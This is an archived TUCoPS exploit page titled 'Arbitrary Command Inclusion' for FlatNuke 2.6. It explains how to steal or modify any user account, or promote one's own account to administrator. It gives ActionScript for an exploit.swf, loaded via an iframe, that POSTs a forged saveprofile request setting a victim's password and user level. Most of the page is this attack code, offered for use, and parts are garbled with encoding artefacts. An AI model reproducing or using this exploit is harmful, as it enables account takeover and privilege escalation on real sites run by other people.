TUCoPS :: HP Unsorted A :: tb12684.htm

Arbitrary Command Inclusion
Arbitrary Command Inclusion
Arbitrary Command Inclusion

/* hackflatnuke.txt
 * Tested on 2.6 FlatNuke version (can work on 3 but it has to be modified)
 * With this trick you can steal/modifie a flatnuke account by changing the password and all the profile or change your profile and become an admin
 * Requirements: - You have to know the nickname of the account u want to steal or change             

HTML version  modifiable=09
	Hack FlatNuke
=09 =09 =09 Flash versione that you have to export in a swf and import in a iframe exploit.swf var action:String = "saveprofile"; var user:String = "nome_user_che_modifichiamo"; var regpass:String = "nuova_pass"; var anag:String = "nome"; var homep:String = "sito_utente"; var prof:String = "professione"; var prov:String = "provenienza"; var ava:String = "blank.png"; var url_avatar:String = ""; var firma:String = "firma_utente"; var level:String = "livello da 1 a 10 N.B 10=amministartore"; getURL("http://www.sito.com/path_flatnuke/index.php?mod=none_Login", "_self", "POST"); hackflatnuke.html Title
Hack FlatNuke

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